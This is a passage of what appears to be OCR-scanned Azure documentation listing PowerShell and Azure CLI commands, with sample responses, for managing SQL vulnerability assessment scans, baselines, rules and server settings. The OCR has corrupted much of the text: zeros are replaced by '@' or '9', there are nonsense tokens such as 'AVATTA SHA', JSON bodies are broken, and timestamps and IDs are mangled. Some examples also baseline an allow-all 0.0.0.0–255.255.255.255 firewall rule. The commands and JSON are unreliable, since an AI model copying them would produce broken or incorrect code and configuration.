icrosoft.Sql/servers/databases/vulnerabilityAssessments/scans"} 


Example 2: 


Azure PowerShell 


Connect-AzAccount -Subscription 90000000-1111-2222-3333-444444444444 
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1 
Get-SqlVulnerabilityAssessmentScans -SubscriptionId 00000000-1111-2222-3333- 
444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName 
vulnerabilityaseessmenttest -DatabaseName db 


Headers : {[Cache-Control, System.String[]], [Pragma, System.String[]], 
[x-ms-request-id, System.String[]], [Server, 
System. String[ ] ]...} 


Version sal 
StatusCode : 200 
Method : GET 
Content : {"value":[{"properties":{"scanId": "f64d81a1-9d7b-4516-a623- 


albfc845ed7e", "triggerType":"OnDemand", "state": 
"Passed", "startTime":"2023-04- 
17712:52:41.4142209Z" , "endTime" :"2023-04-17T12:52:41.5235755Z", "server": 


"vulnerabilityaseessmenttest", "database": "db", "sqlVersion":"16.0.5100", "high 
SeverityFailedRulesCount":@, "mediumSeverityFail 


edRulesCount":0, "lowSeverityFailedRulesCount":@, "“totalPassedRulesCount":24," 
totalFailedRulesCount":@, IT Gota 


1RulesCount":24,"isBaselineApplied":true}, "id":"/subscriptions/00000000- 
1111-2222-3333-444444444444/resour 


ceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulne 

rabilityaseessmenttest/databases/db/vulnerabilityAss 
essments/Default/scans/f64d81a1-9d7b-4516-a623- 

albfc845ed7e", "name": "f64d81a1-9d7b-4516-a623-albfc845ed7e" 


» type": "Microsoft.Sql/servers/databases/vulnerabilityAssessments/scans"}]} 


Invoke SQL vulnerability assessment scan 


Azure PowerShell 


Connect-AzAccount -Subscription 00000000-1111-2222-3333-444444444444 
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1 
Invoke-SqlVulnerabilityAssessmentScan -SubscriptionId 00000000-1111-2222- 
3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg - 
ServerName vulnerabilityaseessmenttest -DatabaseName db 


Headers : {[Cache-Control, System.String[]], [Pragma, System.String[]], 
[Location, System.String[]], [Retry-After, S 

ystem.String[ ] ]...} 
Version € aod 


StatusCode : 202 

Method : POST 

Content 

{"operation": "ExecuteDatabaseVulnerabilityAssessmentScan", "startTime" :"2023- 
@5-15T10:58:48.367Z"} 


Get SQL vulnerability assessment server setting 


Azure PowerShell 


Connect-AzAccount -Subscription 90000000-1111-2222-3333-444444444444 
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1 
Get-SqlVulnerabilityAssessmentServerSetting -SubscriptionId 90000000-1111- 
2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg - 
ServerName vulnerabilityaseessmenttest 


Headers : {[Cache-Control, System.String[]], [Pragma, System.String[]], 
[x-ms-request-id, System.String[]], [Server, 
System. String[ ] ]...} 


Version Soba) 
StatusCode : 200 
Method : GET 
Content : {"properties": 


{"state":"Enabled"},"id":"/subscriptions/00000000- 1111-2222 -3333- 
444444444444/resourceGroups 


/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerability 


aseessmenttest/sqlVulnerabilityAssessments/Default", 


name": "Default", "type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments"} 


Set SQL vulnerability assessment server setting 
Example 1: 


Azure PowerShell 


Connect-AzAccount -Subscription 00000000-1111-2222-3333-444444444444 
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1 
Set-SqlVulnerabilityAssessmentServerSetting -SubscriptionId eeeeeeee-1111- 
2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg - 
ServerName vulnerabilityaseessmenttest -State 'Enabled' 


Headers : {[Cache-Control, System.String[]], [Pragma, System.String[]], 
[x-ms-request-id, System.String[]], [Server, 
System. String[ ] ]...} 
Version Saba 
StatusCode : 200 
Method : PUT 


Content : {"properties": 
{"state":"Enabled"},"id":"/subscriptions/00000000- 1111-2222 -3333- 
444444444444/resourceGroups 


/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerability 


aseessmenttest/sqlVulnerabilityAssessments/Default", 


name": "Default", "type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments"} 


Example 2: 
Azure PowerShell 


Connect-AzAccount -Subscription 90000000-1111-2222-3333-444444444444 
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1 
Set-SqlVulnerabilityAssessmentServerSetting -SubscriptionId eeeeeeee-1111- 
2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg - 
ServerName vulnerabilityaseessmenttest -State 'Disabled' 


Headers : {[Cache-Control, System.String[]], [Pragma, System.String[]], 
[x-ms-request-id, System.String[]], [Server, 
System.String[ ] ]...} 


Version aIl 
StatusCode : 200 
Method : PUT 
Content : {"properties": 


{"state":"Disabled"},"id":"/subscriptions/0@00000@0- 1111-2222 -3333- 
444444444444/resourceGroup 


s/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilit 
yaseessmenttest/sqlVulnerabilityAssessments/Default", 


"name":"Default", "type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments" } 


Remove SQL vulnerability assessment server setting 


Azure PowerShell 


Connect-AzAccount -Subscription 90000000-1111-2222-3333-444444444444 
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1 
Remove-SqlVulnerabilityAssessmentServerSetting -SubscriptionId 00000000- 
1111-2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg 
-ServerName vulnerabilityaseessmenttest 


Headers : {[Pragma, System.String[]], [x-ms-request-id, System.String[]], 
[x-ms-ratelimit-remaining-subscription-deletes, System.String[]], [x-ms- 
correlation-request-id, System.String[]]...} 

Version € doi 

StatusCode : 200 


Method : DELETE 
Content 


Next steps 


Find and remediate vulnerabilities in your Azure SQL databases 


Express configuration Azure Command 
Line Interface (CLI) commands reference 


Article e 06/28/2023 


This article lists the Azure Command Line Interface (CLI) commands that can be used 
with SQL vulnerability assessment express configuration. 


e Set SQL vulnerability assessment baseline on system database 

e Get SQL vulnerability assessment baseline on system database 

e Set SQL vulnerability assessment baseline on user database 

e Get SQL vulnerability assessment baseline on user database 

e Set SQL vulnerability assessment baseline rule on system database 

e Get SQL vulnerability assessment baseline rule on system database 

e Remove SQL vulnerability assessment baseline rule on system database 
e Set SQL vulnerability assessment baseline rule on user database 

e Get SQL vulnerability assessment baseline rule on user database 

e Remove SQL vulnerability assessment baseline rule on user database 
e Get SQL vulnerability assessment scan results on system database 

e Get SQL vulnerability assessment scan results on user database 

e Get SQL vulnerability assessment scans on system database 

e Get SQL vulnerability assessment scans on user database 

e Invoke SQL vulnerability assessment scan on system database 

e Invoke SQL vulnerability assessment scan on user database 

e Get SQL vulnerability assessment server setting 

e Set SQL vulnerability assessment server setting 

e Remove SQL vulnerability assessment server setting 


© Note 


For Azure CLI reference for the classic configuration, see Manage findings in your 
Azure SQL databases 


Set SQL vulnerability assessment baseline on 
system database 


Example 1: 


Azure CLI 


az rest --method Put --uri /subscriptions/@00000@@- 1111-2222 -3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/defaul 
t/baselines/default ?api-version=2022-0@2-@1-preview --uri-parameters 
systemDatabaseName=master --body '{ "properties": { “latestScan": true, 
anesultsus Nl F}: 


"id": "/subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Defaul 
t/baselines/Default", 

"name": "Default", 

"properties": { 

"results": { 


"VA2@60": [ 
[ 
"False" 
] 
b 
"VA2061": [ 
[ 
"True" 
] 
] 
} 
J 
"type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments/baselines" 
} 
Example 2: 
Azure CLI 


az rest --method Put --uri /subscriptions/000000@@- 1111-2222 -3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/defaul 
t/baselines/default ?api-version=2022-02-0@1-preview --uri-parameters 
systemDatabaseName=master --body '{\"properties\": { \"latestScan\": false, 
WIRSSUIRES NS a WSS S(T GAUSE aiu EES ak 25S. 25572557255 H 


diko 


"id": "/subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Defaul 
t/baselines/Default", 

"name": "Default", 

"properties": { 

"results": { 
"VA2063": [ 


[ 


"AllowAl1", 
"0.0.0.0", 
"255.255.255.255" 


type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments/baselines"” 


Get SQL vulnerability assessment baseline on system 
database 


Example 1: 


Azure CLI 


az rest --method Get --uri /subscriptions/00000000-1111 -2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/defaul 
t/baselines/default ?api-version=2022-02-01-preview --uri-parameters 
systemDatabaseName=master 


"id": "/subscriptions/@Q000000-1111 -2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/databases/master/sqlVulnerabilityA 
ssessments/Default/baselines/Default", 

"name": "Default", 

"properties": { 

"results": { 


"VA2060": [ 
[ 
"False" 
] 
I 
"VA2061": [ 
[ 
"True" 
] 
] 
} 
}s 
"type" 


"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines” 


} 


Example 2: 


Azure CLI 


az rest --method Get --uri /subscriptions/00000000-1111 -2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/defaul 
t/baselines ?api-version=2022-@2-@1-preview --uri-parameters 
systemDatabaseName=master 
{ 

"value": [ 

{ 

"id": "/subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Defaul 
t/baselines/Default", 

"name": "Default", 

"properties": { 

"results": { 


"VA2060": [ 
[ 
"False" 
] 
LL 
"VA2061": [ 
[ 
"True" 
] 
] 
E 
J 
"type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments/baselines" 


Set SQL vulnerability assessment baseline on user 
database 


Example 1: 


Azure CLI 


az rest --method Put --uri /subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAsses 
sments/default/baselines/default ?api-version=2022-02-@1-preview --body '{ 
"properties": { "latestScan": true, results: k the 

{ 

"id": "/subscriptions/00000000-1111 -2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAsses 
sments/Default/baselines/Default", 

"name": "Default", 


"properties": { 
"results": { 


AVATTA SHA 
[ 
"True" 
] 
]; 
GURE NEI 
[ 
"False" 
] 
] 
} 
hs 
"type" 


"Microsoft .Sql/servers/databases/sqlVulnerabilityAssessments/baselines" 


} 


Example 2: 


Azure CLI 


az rest --method Put --uri /subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAsses 
sments/default/baselines/default ?api-version=2022-02-01-preview --body 
"{\"properties\": { \"latestScan\": false, \"results\": {\"VA2062\": 
[[\"AllowAl1\",\"0.0.0.0\",\"255.255.255.255\" ]]}}}' 


"id": "/subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAsses 
sments/Default/baselines/Default", 

"name": "Default", 

"properties": { 

"results": { 


"VA2062": [ 
[ 
"AllowAl1", 
"9.0.0.0", 
125572557255725 55 
] 
] 
} 
KO 
"type": 


"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines" 


} 


Get SQL vulnerability assessment baseline on user 
database 


Example 1: 


Azure CLI 


az rest --method Get --uri /subscriptions/00000000-1111 -2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAsses 
sments/default/baselines/default ?api-version=2022-02-@1-preview 

{ 

"id": "/subscriptions/00000000-1111 -2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAsses 
sments/Default/baselines/Default", 

"name": "Default", 

"properties": { 

"results": { 


“VAIN AS" ||, 
[ 
"True" 
] 
]; 
EEE 
[ 
"False" 
] 
] 
} 
Jo 
"type" 


"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines" 


} 


Example 2: 


Azure CLI 


az rest --method Get --uri /subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAsses 
sments/default/baselines?api-version=2022-02-@1-preview 


{ 
"value": [ 
{ 

"id": "/subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAsses 
sments/Default/baselines/Default", 


"name": "Default", 
"properties": { 
"results": { 


GUREEN 
[ 
"True" 
] 
]; 
EVAT TORSE 
[ 
"False" 
] 
] 
} 
KO 
"type": 


"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines" 


} 


Set SQL vulnerability assessment baseline rule on system 
database 


Azure CLI 


az rest --method Put --uri /subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/defaul 
t/baselines/default/rules/$RuleId?api-version=2022-02-@1-preview --uri- 
parameters systemDatabaseName=master --body '{ \"properties\": { 


\"latestScan\": false, \"results\": [ [ \"AllowAl1\", 
\"0.0.0.0\", \"255.255.255.255\" ] I p 
{ 


"id": "/subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Defaul 
t/baselines/default/rules/VA2065", 

"name": "VA2@65", 

"properties": { 

"results": [ 


[ 
"AllowAll", 
"Q@.0.0.0", 
"255.255.255.255" 
] 


J> 


"type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments/baselines" 


} 


Get SQL vulnerability assessment baseline rule on system 
database 


Example 1: 


Azure CLI 


az rest --method Get --uri /subscriptions/00000000-1111 -2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/defaul 
t/baselines/default/rules/$RuleId?api-version=2022-02-@1-preview --uri- 
parameters systemDatabaseName=master 

{ 

"id": "/subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Defaul 
t/baselines/default/rules/VA2065", 

"name": "VA2@65", 

"properties": { 

"results": [ 


[ 
"AllowAll1", 
IKEa 
253.253.255. 2555 
] 
] 
J 
"type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments/baselines" 
} 
Example 2: 
Azure CLI 


az rest --method Get --uri /subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/defaul 
t/baselines/default/rules?api-version=2022-@2-01-preview --uri-parameters 
systemDatabaseName=master 


{ 


"value": [ 
{ 

"id": "/subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Defaul 
t/baselines/default/rules/VA2060", 


"name": "VA2@60", 
"properties": { 
"results": [ 


[ 
"False" 
] 
] 
b 
"type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments/baselines” 
J 


"id": "/subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Defaul 
t/baselines/default/rules/VA2061", 

"name": "VA2@61", 

"properties": { 

"results": [ 


[ 
“True” 
] 
] 
J 
"type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments/baselines" 
J 


{ 
"id": "/subscriptions/00000000-1111-2222-3333- 


444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Defaul 
t/baselines/default/rules/VA2@65", 
"name": "VA2@65", 
"properties": { 
“Resuktsal) I 


[ 
"AllowAl1", 


"8.0.0.0", 
"255.255.255.255" 


: "Microsoft.Sql/servers/sqlVulnerabilityAssessments/baselines" 


Remove SQL vulnerability assessment baseline rule on 
system database 


Azure CLI 


az rest --method Delete --uri /subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/defaul 
t/baselines/default/rules/$RuleId?api-version=2022-02-@1-preview --uri- 
parameters systemDatabaseName=master 


Set SQL vulnerability assessment baseline rule on user 
database 


Azure CLI 


az rest --method Put --uri /subscriptions/00000000-1111 -2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAsses 
sments/default/baselines/default/rules/$RuleId?api-version=2022-02-01- 
preview --body '{ \"properties\": { \"latestScan\": false, 


\"results\": [ [ \"AllowAl1\", \"0.0.0.0\", 
\"255.255.255.255\" ] I OEE 
{ 


"id": "/subscriptions/00000000-1111 -2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAsses 
sments/Default/baselines/default/rules/VA2062", 

"name": "VA2@62", 

"properties": { 

"results": [ 
[ 
"AllowAll1", 
"9.0.0.0", 
1255725572551255% 


] 
J 
"type": 
"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines" 


} 


Get SQL vulnerability assessment baseline rule on user 
database 


Example 1: 


Azure CLI 


az rest --method Get --uri /subscriptions/00000000-1111 -2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 


t.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAsses 
sments/default/baselines/default/rules/$RuleId?api-version=2022-02-01- 
preview 


"id": "/subscriptions/00000000-1111 -2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAsses 
sments/Default/baselines/default/rules/VA2062", 

"name": "VA2@62", 

"properties": { 

"results": [ 


[ 
"AllowA11", 
"Q@.0.0.0", 
"255.255.255.255" 
] 
] 
Ja 
itype 


"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines" 


} 


Example 2: 
Azure CLI 


az rest --method Get --uri /subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAsses 
sments/default/baselines/default/rules?api-version=2022-02-01-preview 


"value": [ 
{ 

"id": "/subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAsses 
sments/Default/baselines/default/rules/VA1143", 

"name": "VA1143", 

"properties": { 

"results": [ 


[ 
“True” 
] 
] 
J 
"type": 
"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines" 
J 
{ 


"id": "/subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 


t.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAsses 
sments/Default/baselines/default/rules/VA1219", 
"name": "VA1219", 
"properties": { 
"results": [ 


[ 
“False” 
] 
] 
Jo 
"type": 
"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines" 
} 


Remove SQL vulnerability assessment baseline rule on 
user database 


Azure CLI 


az rest --method Delete --uri /subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAsses 
sments/default/baselines/default/rules/$RuleId?api-version=2022-@2-01- 
preview 


Get SQL vulnerability assessment scan results on system 
database 


Example 1: 


Azure CLI 


az rest --method Get --uri /subscriptions/00000000-1111 -2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/defaul 
t/scans/$ScanId/scanresults/$RuleId?api-version=2022-02-@1-preview --uri- 
parameters systemDatabaseName=master 

{ 

"id": "/subscriptions/@Q000000-1111 -2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Defaul 
t/scans/VA2@65/scanResults/VA2065", 

"name": "VA2@65", 

"properties": { 

"baselineAdjustedResult": null, 
"errorMessage": null, 


"“isTrimmed": false, 
"queryResults": [], 
"remediation": { 

"automated": false, 

"description": "Evaluate each of the server-level firewall rules. 
Remove any rules that grant unnecessary access and set the rest as a 
baseline. Deviations from the baseline will be identified and brought to 
your attention in subsequent scans.", 

“portalLink": "ReviewServerFirewallRules", 

esoriptse: ||] 

J 
"ruleId": "VA2065", 
"ruleMetadata": { 

"benchmarkReferences": [], 

"category": "SurfaceAreaReduction", 

"description": "The Azure SQL server-level firewall helps protect your 
data by preventing all access to your databases until you specify which IP 
addresses have permission. Server-level firewall rules grant access to all 
databases that belong to the server based on the originating IP address of 
each request. \n\nServer-level firewall rules can be created and managed 
through Transact-SQL as well as through the Azure portal or PowerShell. For 
more details please see: https://docs.microsoft.com/en-us/azure/sql- 
database/sql-database-firewall-configure.\n\nThis check enumerates all the 
server-level firewall rules so that any changes made to them can be 
identified and addressed.", 

"queryCheck": { 

"columnNames": [ 
"Firewall Rule Name", 
"Start Address", 
"End Address" 
LL 
"expectedResult": [], 
"query": "SELECT name AS [Firewall Rule Name]\n  »start_ip_address 
AS [Start Address]\n ,»end_ip_address AS [End Address]\nFROM 
sys.firewall rules" 

hs 

"rationale": "Firewall rules should be strictly configured to allow 
access only to client computers that have a valid need to connect to the 
database server. Any superfluous entries in the firewall may pose a threat 
by allowing an unauthorized source access to your databases.", 

"ruleId": "VA2065", 

"ruleType": "BaselineExpected", 

"severity": "High", 

"title": "Server-level firewall rules should be tracked and maintained 
at a strict minimum" 


hs 


"status": "NonFinding" 


"Microsoft.Sql/servers/sqlVulnerabilityAssessments/scans/scanResults" 


} 


Example 2: 


Azure CLI 


az rest --method Get --uri /subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/defaul 
t/scans/$ScanId/scanresults ?api-version=2022-02-@1-preview --uri-parameters 
systemDatabaseName=master 


"value": [ 
{ 

"id": "/subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Defaul 
t/scans/VA1223/scanResults/VA1223", 

"name": "VA1223", 

"properties": { 

"baselineAdjustedResult": null, 
"errorMessage": null, 
"“isTrimmed": false, 
"queryResults": [], 
"remediation": { 

"automated": false, 


"description": "Create new certificates, re-encrypt the data/sign- 
data using the new key, and drop the affected keys.", 

"portalLink": "" 

“Seayanes’ sl] 


J 

anule rda: MOE a 

"ruleMetadata": { 
"benchmarkReferences": [ 


{ 
"benchmark": "FedRAMP", 
"reference": null 
} 
LL 
"category": "DataProtection", 
"description": "Certificate keys are used in RSA and other 


encryption algorithms to protect data. These keys need to be of enough 
length to secure the user's data. This rule checks that the key's length is 
at least 2048 bits for all certificates.", 
"queryCheck": { 
"“columnNames": | 
"Certificate Name", 
"Thumbprint" 
l 
"expectedResult": [], 
"query": “SELECT name AS [Certificate Name], thumbprint AS 
[Thumbprint]\nFROM sys.certificates\nWHERE key_length < 2048" 
ne 
"rationale": "Key length defines the upper-bound on the encryption 
algorithm's security. Using short keys in encryption algorithms may lead to 
weaknesses in data-at-rest protection.", 
RUS AGEk 


"ruleType": "NegativeList", 

"severity": "High", 

"title": "Certificate keys should use at least 2048 bits” 
J 


"status": "NonFinding" 


"Microsoft.Sql/servers/sqlVulnerabilityAssessments/scans/scanResults" 
hs 
{ 

"id": "/subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Defaul 
t/scans/VA2@60/scanResults/VA2060", 

"name": "VA2@60", 

"properties": { 

"paselineAdjustedResult": { 
"baseline": { 
"expectedResults": [ 


[ 
"False" 
] 
]; 
“updatedTime": "2@23-@5-15T12:36:39.9688256+00:00" 
IO 


"resultsNotInBaseline": [], 
"resultsOnlyInBaseline": [], 
"status": "“NonFinding" 
J 
"errorMessage": null, 
"isTrimmed": false, 
"queryResults": [ 


"remediation": { 

"automated": false, 

"description": "It is recommended to enable SQL Threat Detection 
at the server level so that all activities on the server itself and the 
databases that belong to it are protected.", 

"portalLink": "EnableAds", 

sscriptsa ii] 

Jo 
"ruleId": "VA2060", 
"ruleMetadata": { 

"benchmarkReferences": [], 

"category": "DataProtection", 

"description": "SQL Threat Detection provides a layer of security, 
which detects potential vulnerabilities and anomalous activity in databases, 
such as SQL injection attacks and unusual behavior patterns. When a 
potential threat is detected, Threat Detection sends an actionable real-time 
alert by email and in Azure Security Center, which includes clear 
investigation and remediation steps for the specific threat. For more 
information please see https://docs.microsoft.com/en-us/azure/sql- 


database/sql-database-threat-detection.\nThis check verifies that SQL Threat 
Detection is enabled", 
"queryCheck": { 
"“columnNames": | 
"Violation" 
LL 
"expectedResult": [ 
[ 
"o" 
] 
b 
"query": "SELECT CASE WHEN EXISTS\n ( SELECT * FROM sys.audits 
WHERE name LIKE ‘'%SqlDbThreatDetection_ServerAudit%' ) THEN @\n ELSE 1\n END 
AS [Violation]" 
J 
"rationale": "Even when database systems apply thorough security 
measures, breaches can occur and it is important to have a detection 
mechanism in place. SQL Threat Detection should be enabled to detect any 
such potential threats that may compromise the data stored in Azure SQL 
Databases.", 
"ruleId": "VA2060", 
"ruleType": "Binary", 
"severity": "Medium", 
"title": "SQL Threat Detection should be enabled at the server 


level" 
J 
"status": "NonFinding" 
J 
"type" 
"Microsoft.Sql/servers/sqlVulnerabilityAssessments/scans/scanResults" 
J 
] 
} 


Get SQL vulnerability assessment scan results on user 
database 


Example 1: 
Azure CLI 


az rest --method Get --uri /subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAsses 
sments/default/scans/$ScanId/scanresults/$RuleId?api-version=2022-02-01- 
preview 

{ 

"id": "/subscriptions/00000000-1111 -2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAsses 
sments/Default/scans/VA2062/scanResults/VA2062", 


"name": "VA2@62", 
"properties": { 
"paselineAdjustedResult": { 
"baseline": { 
"expectedResults": [ 


[ 
"AllowAll", 
"0.0.0.0", 
"255.255.255.255" 
] 
b 


"“updatedTime": "2023-@5-15T12:52:17.0297386+00:00" 
J 


"resultsNotInBaseline": [], 
"resultsOnlyInBaseline": [ 


[ 
"AllowAl1", 
*Bo@oGo@ » 
"255.255.255.255" 
] 
LL 
"status": "Finding" 


J 


"errorMessage": null, 

"isTrimmed": false, 

"queryResults": [], 

"remediation": { 
"automated": false, 
"description": “Remove database firewall rules that grant excessive 

access", 

"portalLink": 
“cemos e I 


J 
"ruleId": "VA2062", 


"ruleMetadata": { 

"benchmarkReferences": [], 

"category": "SurfaceAreaReduction", 

"description": "The Azure SQL Database-level firewall helps protect 
your data by preventing all access to your database until you specify which 
IP addresses have permission. Database-level firewall rules grant access to 
the specific database based on the originating IP address of each 
request.\n\nDatabase-level firewall rules for master and user databases can 
only be created and managed through Transact-SQL (unlike server-level 
firewall rules which can also be created and managed using the Azure portal 
or PowerShell). For more details please see: https://docs.microsoft.com/en- 
us/azure/sql-database/sql-database-firewall-configure\n\nThis check verifies 
that each database-level firewall rule does not grant access to more than 
